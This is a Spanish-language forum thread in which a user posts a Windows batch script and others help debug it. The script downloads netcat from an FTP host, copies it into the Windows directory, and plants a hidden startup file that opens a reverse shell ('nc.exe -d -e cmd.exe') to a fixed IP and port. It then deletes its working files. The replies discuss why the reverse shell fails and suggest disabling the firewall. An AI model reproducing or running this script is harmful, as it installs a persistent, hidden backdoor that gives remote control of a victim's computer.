Hola Visitante

Autor Tema: Bat que se copia en \'inicio\'  (Leído 3985 veces)

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Bat que se copia en \'inicio\'
« en: Enero 04, 2009, 11:31:24 am »
Código: [Seleccionar]
@echo off

mkdir %homedrive%\\\\temp
cd %homedrive%\\\\temp
echo *********>ftp1.txt
echo *********>ftp2.txt
echo get nc.html>ftp3.txt
echo bye>ftp4.txt
copy /b ftp1.txt datos.txt
copy /b datos.txt+ftp2.txt datos.txt
copy /b datos.txt+ftp3.txt datos.txt
copy /b datos.txt+ftp4.txt datos.txt
ftp -s:datos.txt  berniyjavi.iespana.es
ren nc.html nc.exe
copy nc.exe %windir%
echo start %windir%\\\\nc.exe -d -e cmd.exe 192.168.1.2 6000> 123.bat
copy 123.bat \"%homedrive%%homepath%\\\\MENINI~1\\\\Programas\\\\Inicio\"
cd \"%homedrive%%homepath%\\\\MENINI~1\\\\Programas\\\\Inicio\\\\\"
attrib +r +h +s +a 123.bat
start 123.bat

cd %homedrive%\\\\temp
del /Q *.*
cd ..
erase /q temp

onwheels256

  • Administrator
  • *****
  • Mensajes: 172
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #1 en: Enero 04, 2009, 03:32:34 pm »
berni esta completado el bat o aun no?

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #2 en: Enero 04, 2009, 03:47:53 pm »
un no, me falla la parte de que se ejecute el netcat.... me sale çun error

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #3 en: Enero 04, 2009, 05:06:39 pm »

un no, me falla la parte de que se ejecute el netcat.... me sale çun error


que error te tira?

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #4 en: Enero 04, 2009, 11:33:01 pm »



que error te tira?


que no se puede ejecutar desde dos-....

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #5 en: Enero 05, 2009, 12:34:25 am »
Por lo que veo te descargas el netcat del FTP y tal, intuyo que el error que te tira es \"no es una aplicación win32 valida\" o algo parecido, si estoy en lo cierto es problema del firewall, puedes desactivarlo o de lo contrario darle permisos a tu .bat...

Un poco de aplicación, en pocas palabras, si tienes el firewall puesto te descargas en realidad un archivo sin contenido(0kb) que es nc.html en tu caso y al ejecutarlo por el bat te tira el error...


Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #6 en: Enero 05, 2009, 12:52:44 am »
no, te equivocas, en netcat si lo abro sin el bat o cn el bat sin opciones funciona, lo k no consigo es hacerlo funcionar como shell inversa, lo que me dice es que salta un error diciendo k esa aplicacion no se ejecuta en dos...

mñna pegare el error...

onwheels256

  • Administrator
  • *****
  • Mensajes: 172
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #7 en: Febrero 28, 2009, 08:07:44 pm »
lo has conseguido resolver¿?

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Bat que se copia en \'inicio\'
« Respuesta #8 en: Febrero 28, 2009, 08:11:15 pm »

lo has conseguido resolver¿?



pues ni lo he seguido,... empece con C y tampoco.... si es que esto de tener alguien comn quien estar xDD